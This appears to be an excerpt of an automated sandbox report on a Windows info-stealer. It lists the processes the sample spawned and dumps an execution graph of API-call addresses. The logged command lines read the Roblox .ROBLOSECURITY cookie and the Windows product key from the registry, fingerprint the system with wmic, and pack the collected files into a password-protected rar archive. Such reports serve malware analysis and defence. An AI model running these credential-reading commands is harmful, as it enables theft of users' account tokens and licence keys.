Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:96
Start time:02:42:04
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:97
Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:98
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                            Imagebase:0x7ff738e70000
                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:99
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESBE0B.tmp" "c:\Users\user\AppData\Local\Temp\jnxiphgt\CSC11F91C33F0BB4EC3B771882E34D952E.TMP"
                                                                                                                                                                                                                            Imagebase:0x7ff6b2a50000
                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:100
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:101
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:102
                                                                                                                                                                                                                            Start time:02:42:05
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:103
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:104
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:105
                                                                                                                                                                                                                            Start time:02:42:18
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\_MEI32202\rar.exe a -r -hp"Logger1@12345" "C:\Users\user\AppData\Local\Temp\C7XW6.zip" *
Imagebase:0x7ff6bbcb0000
File size:630'736 bytes
MD5 hash:9C223575AE5B9544BC3D69AC6364F75E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Has exited:true

Target ID:106
Start time:02:42:19
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic os get Caption"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:107
Start time:02:42:19
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:108
Start time:02:42:19
Start date:13/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic os get Caption
Imagebase:0x7ff6c9a10000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:109
Start time:02:42:20
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:110
Start time:02:42:20
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:111
Start time:02:42:21
Start date:13/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic computersystem get totalphysicalmemory
Imagebase:0x7ff6c9a10000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:112
Start time:02:42:21
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:113
Start time:02:42:21
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:114
Start time:02:42:21
Start date:13/12/2024
Path:C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):false
Commandline:wmic csproduct get uuid
Imagebase:0x7ff6c9a10000
File size:576'000 bytes
MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:115
Start time:02:42:22
Start date:13/12/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
Imagebase:0x7ff6ccf90000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:116
Start time:02:42:22
Start date:13/12/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:117
                                                                                                                                                                                                                            Start time:02:42:22
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:118
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:119
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:120
                                                                                                                                                                                                                            Start time:02:42:23
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                            Imagebase:0x7ff6c9a10000
                                                                                                                                                                                                                            File size:576'000 bytes
                                                                                                                                                                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:121
                                                                                                                                                                                                                            Start time:02:42:24
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                                                                                                                                                                                            Imagebase:0x7ff6ccf90000
                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:122
                                                                                                                                                                                                                            Start time:02:42:24
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                            Target ID:123
                                                                                                                                                                                                                            Start time:02:42:25
                                                                                                                                                                                                                            Start date:13/12/2024
                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                            Has exited:true

Execution Graph

Execution Coverage:8.4%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:20.1%
Total number of Nodes:2000
Total number of Limit Nodes:26
16272->16088 16702 7ff62cc7c8c0 16273->16702 16276 7ff62cc736eb GetLastError 16709 7ff62cc72c50 16276->16709 16277 7ff62cc73710 16704 7ff62cc792f0 FindFirstFileExW 16277->16704 16281 7ff62cc7377d 16735 7ff62cc794b0 16281->16735 16282 7ff62cc73723 16724 7ff62cc79370 CreateFileW 16282->16724 16284 7ff62cc7c5c0 _log10_special 8 API calls 16286 7ff62cc737b5 16284->16286 16286->16133 16295 7ff62cc71950 16286->16295 16288 7ff62cc7378b 16291 7ff62cc72810 49 API calls 16288->16291 16293 7ff62cc73706 16288->16293 16289 7ff62cc7374c __vcrt_FlsAlloc 16289->16281 16290 7ff62cc73734 16727 7ff62cc72810 16290->16727 16291->16293 16293->16284 16296 7ff62cc745b0 108 API calls 16295->16296 16297 7ff62cc71985 16296->16297 16298 7ff62cc71c43 16297->16298 16299 7ff62cc77f80 83 API calls 16297->16299 16300 7ff62cc7c5c0 _log10_special 8 API calls 16298->16300 16301 7ff62cc719cb 16299->16301 16302 7ff62cc71c5e 16300->16302 16344 7ff62cc71a03 16301->16344 17140 7ff62cc80744 16301->17140 16302->16095 16302->16096 16304 7ff62cc800bc 74 API calls 16304->16298 16305 7ff62cc719e5 16306 7ff62cc71a08 16305->16306 16307 7ff62cc719e9 16305->16307 17144 7ff62cc8040c 16306->17144 16308 7ff62cc84f78 _get_daylight 11 API calls 16307->16308 16310 7ff62cc719ee 16308->16310 17147 7ff62cc72910 16310->17147 16312 7ff62cc71a26 16315 7ff62cc84f78 _get_daylight 11 API calls 16312->16315 16313 7ff62cc71a45 16318 7ff62cc71a5c 16313->16318 16319 7ff62cc71a7b 16313->16319 16316 7ff62cc71a2b 16315->16316 16317 7ff62cc72910 54 API calls 16316->16317 16317->16344 16320 7ff62cc84f78 _get_daylight 11 API calls 16318->16320 16321 7ff62cc71c80 49 API calls 16319->16321 16322 7ff62cc71a61 16320->16322 16323 7ff62cc71a92 16321->16323 16325 7ff62cc72910 54 API calls 16322->16325 16324 7ff62cc71c80 49 API calls 16323->16324 16326 7ff62cc71add 16324->16326 16325->16344 16327 7ff62cc80744 73 API calls 16326->16327 16328 7ff62cc71b01 16327->16328 16329 7ff62cc71b16 16328->16329 16330 7ff62cc71b35 16328->16330 16331 7ff62cc84f78 
_get_daylight 11 API calls 16329->16331 16332 7ff62cc8040c _fread_nolock 53 API calls 16330->16332 16333 7ff62cc71b1b 16331->16333 16334 7ff62cc71b4a 16332->16334 16335 7ff62cc72910 54 API calls 16333->16335 16336 7ff62cc71b50 16334->16336 16337 7ff62cc71b6f 16334->16337 16335->16344 16339 7ff62cc84f78 _get_daylight 11 API calls 16336->16339 17162 7ff62cc80180 16337->17162 16340 7ff62cc71b55 16339->16340 16342 7ff62cc72910 54 API calls 16340->16342 16342->16344 16343 7ff62cc72710 54 API calls 16343->16344 16344->16304 16346 7ff62cc78a2a 16345->16346 16347 7ff62cc79400 2 API calls 16346->16347 16348 7ff62cc78a49 GetEnvironmentVariableW 16347->16348 16349 7ff62cc78a66 ExpandEnvironmentStringsW 16348->16349 16350 7ff62cc78ab2 16348->16350 16349->16350 16351 7ff62cc78a88 16349->16351 16352 7ff62cc7c5c0 _log10_special 8 API calls 16350->16352 16354 7ff62cc794b0 2 API calls 16351->16354 16353 7ff62cc78ac4 16352->16353 16353->16105 16355 7ff62cc78a9a 16354->16355 16356 7ff62cc7c5c0 _log10_special 8 API calls 16355->16356 16357 7ff62cc78aaa 16356->16357 16357->16105 16359 7ff62cc790f5 16358->16359 17380 7ff62cc78760 GetCurrentProcess OpenProcessToken 16359->17380 16362 7ff62cc78760 7 API calls 16363 7ff62cc79121 16362->16363 16364 7ff62cc7913a 16363->16364 16365 7ff62cc79154 16363->16365 16366 7ff62cc726b0 48 API calls 16364->16366 16367 7ff62cc726b0 48 API calls 16365->16367 16368 7ff62cc79152 16366->16368 16369 7ff62cc79167 LocalFree LocalFree 16367->16369 16368->16369 16370 7ff62cc79183 16369->16370 16372 7ff62cc7918f 16369->16372 17390 7ff62cc72b50 16370->17390 16373 7ff62cc7c5c0 _log10_special 8 API calls 16372->16373 16374 7ff62cc73c55 16373->16374 16374->16151 16375 7ff62cc78850 16374->16375 16376 7ff62cc78868 16375->16376 16377 7ff62cc7888c 16376->16377 16378 7ff62cc788ea GetTempPathW GetCurrentProcessId 16376->16378 16380 7ff62cc78a20 14 API calls 16377->16380 17399 7ff62cc725c0 16378->17399 16381 7ff62cc78898 16380->16381 17406 7ff62cc781c0 16381->17406 16388 
7ff62cc78918 __std_exception_copy 16398 7ff62cc78955 __std_exception_copy 16388->16398 17403 7ff62cc88bd8 16388->17403 16393 7ff62cc7c5c0 _log10_special 8 API calls 16394 7ff62cc73cbb 16393->16394 16394->16151 16394->16161 16399 7ff62cc79400 2 API calls 16398->16399 16407 7ff62cc789c4 __std_exception_copy 16398->16407 16400 7ff62cc789a1 16399->16400 16401 7ff62cc789d9 16400->16401 16402 7ff62cc789a6 16400->16402 16404 7ff62cc882a8 38 API calls 16401->16404 16403 7ff62cc79400 2 API calls 16402->16403 16404->16407 16407->16393 16409 7ff62cc79422 MultiByteToWideChar 16408->16409 16410 7ff62cc79446 16408->16410 16409->16410 16412 7ff62cc7945c __std_exception_copy 16409->16412 16411 7ff62cc79463 MultiByteToWideChar 16410->16411 16410->16412 16411->16412 16412->16164 16424 7ff62cc733ce memcpy_s 16413->16424 16414 7ff62cc7c5c0 _log10_special 8 API calls 16416 7ff62cc73664 16414->16416 16415 7ff62cc735c7 16415->16414 16416->16133 16432 7ff62cc790c0 LocalFree 16416->16432 16418 7ff62cc71c80 49 API calls 16418->16424 16419 7ff62cc735e2 16421 7ff62cc72710 54 API calls 16419->16421 16421->16415 16423 7ff62cc735c9 16427 7ff62cc72710 54 API calls 16423->16427 16424->16415 16424->16418 16424->16419 16424->16423 16426 7ff62cc72a50 54 API calls 16424->16426 16430 7ff62cc735d0 16424->16430 17695 7ff62cc74550 16424->17695 17701 7ff62cc77e10 16424->17701 17713 7ff62cc71600 16424->17713 17761 7ff62cc77110 16424->17761 17765 7ff62cc74180 16424->17765 17809 7ff62cc74440 16424->17809 16426->16424 16427->16415 16431 7ff62cc72710 54 API calls 16430->16431 16431->16415 16434 7ff62cc71ca5 16433->16434 16435 7ff62cc849f4 49 API calls 16434->16435 16436 7ff62cc71cc8 16435->16436 16436->16100 16438 7ff62cc79400 2 API calls 16437->16438 16439 7ff62cc78ba4 16438->16439 16440 7ff62cc882a8 38 API calls 16439->16440 16441 7ff62cc78bb6 __std_exception_copy 16440->16441 16441->16112 16443 7ff62cc745bc 16442->16443 16444 7ff62cc79400 2 API calls 16443->16444 16445 7ff62cc745e4 16444->16445 16446 
7ff62cc79400 2 API calls 16445->16446 16447 7ff62cc745f7 16446->16447 17992 7ff62cc86004 16447->17992 16450 7ff62cc7c5c0 _log10_special 8 API calls 16451 7ff62cc7392b 16450->16451 16451->16101 16452 7ff62cc77f80 16451->16452 16453 7ff62cc77fa4 16452->16453 16454 7ff62cc80744 73 API calls 16453->16454 16459 7ff62cc7807b __std_exception_copy 16453->16459 16455 7ff62cc77fc0 16454->16455 16455->16459 18384 7ff62cc87938 16455->18384 16457 7ff62cc80744 73 API calls 16460 7ff62cc77fd5 16457->16460 16458 7ff62cc8040c _fread_nolock 53 API calls 16458->16460 16459->16106 16460->16457 16460->16458 16460->16459 16462 7ff62cc800ec 16461->16462 18399 7ff62cc7fe98 16462->18399 16464 7ff62cc80105 16464->16101 16466 7ff62cc7c8c0 16465->16466 16467 7ff62cc72734 GetCurrentProcessId 16466->16467 16468 7ff62cc71c80 49 API calls 16467->16468 16469 7ff62cc72787 16468->16469 16470 7ff62cc849f4 49 API calls 16469->16470 16471 7ff62cc727cf 16470->16471 16472 7ff62cc72620 12 API calls 16471->16472 16473 7ff62cc727f1 16472->16473 16474 7ff62cc7c5c0 _log10_special 8 API calls 16473->16474 16475 7ff62cc72801 16474->16475 16475->16133 16477 7ff62cc79400 2 API calls 16476->16477 16478 7ff62cc78b4c 16477->16478 16479 7ff62cc79400 2 API calls 16478->16479 16480 7ff62cc78b5c 16479->16480 16481 7ff62cc882a8 38 API calls 16480->16481 16482 7ff62cc78b6a __std_exception_copy 16481->16482 16482->16116 16484 7ff62cc7c5c9 16483->16484 16485 7ff62cc73ca7 16484->16485 16486 7ff62cc7c950 IsProcessorFeaturePresent 16484->16486 16485->16224 16487 7ff62cc7c968 16486->16487 18410 7ff62cc7cb48 RtlCaptureContext 16487->18410 16493 7ff62cc71c80 49 API calls 16492->16493 16494 7ff62cc744ed 16493->16494 16494->16145 16496 7ff62cc71c80 49 API calls 16495->16496 16497 7ff62cc74650 16496->16497 16497->16161 16497->16497 16499 7ff62cc76dc5 16498->16499 16500 7ff62cc73e6c 16499->16500 16501 7ff62cc84f78 _get_daylight 11 API calls 16499->16501 16504 7ff62cc77330 16500->16504 16502 7ff62cc76dd2 16501->16502 16503 
7ff62cc72910 54 API calls 16502->16503 16503->16500 18415 7ff62cc71470 16504->18415 16506 7ff62cc77358 18521 7ff62cc76350 16572->18521 16575 7ff62cc73399 16581 7ff62cc73670 16575->16581 16602 7ff62cc8a5cc 16585->16602 16589 7ff62cc8a8bf 16589->16272 16701 7ff62cc854dc EnterCriticalSection 16595->16701 16603 7ff62cc8a623 16602->16603 16604 7ff62cc8a5e8 GetLastError 16602->16604 16603->16589 16608 7ff62cc8a638 16603->16608 16605 7ff62cc8a5f8 16604->16605 16615 7ff62cc8b400 16605->16615 16609 7ff62cc8a654 GetLastError SetLastError 16608->16609 16610 7ff62cc8a66c 16608->16610 16609->16610 16610->16589 16611 7ff62cc8a970 IsProcessorFeaturePresent 16610->16611 16612 7ff62cc8a983 16611->16612 16693 7ff62cc8a684 16612->16693 16616 7ff62cc8b41f FlsGetValue 16615->16616 16617 7ff62cc8b43a FlsSetValue 16615->16617 16618 7ff62cc8b434 16616->16618 16620 7ff62cc8a613 SetLastError 16616->16620 16619 7ff62cc8b447 16617->16619 16617->16620 16618->16617 16632 7ff62cc8ec08 16619->16632 16620->16603 16622 7ff62cc8b456 16623 7ff62cc8b474 FlsSetValue 16622->16623 16624 7ff62cc8b464 FlsSetValue 16622->16624 16626 7ff62cc8b480 FlsSetValue 16623->16626 16627 7ff62cc8b492 16623->16627 16625 7ff62cc8b46d 16624->16625 16639 7ff62cc8a9b8 16625->16639 16626->16625 16645 7ff62cc8af64 16627->16645 16633 7ff62cc8ec19 _get_daylight 16632->16633 16634 7ff62cc8ec6a 16633->16634 16635 7ff62cc8ec4e HeapAlloc 16633->16635 16650 7ff62cc93600 16633->16650 16653 7ff62cc84f78 16634->16653 16635->16633 16636 7ff62cc8ec68 16635->16636 16636->16622 16640 7ff62cc8a9bd RtlFreeHeap 16639->16640 16641 7ff62cc8a9ec 16639->16641 16640->16641 16642 7ff62cc8a9d8 GetLastError 16640->16642 16641->16620 16643 7ff62cc8a9e5 __free_lconv_num 16642->16643 16644 7ff62cc84f78 _get_daylight 9 API calls 16643->16644 16644->16641 16679 7ff62cc8ae3c 16645->16679 16656 7ff62cc93640 16650->16656 16662 7ff62cc8b338 GetLastError 16653->16662 16655 7ff62cc84f81 16655->16636 16661 7ff62cc90348 EnterCriticalSection 16656->16661 16663 
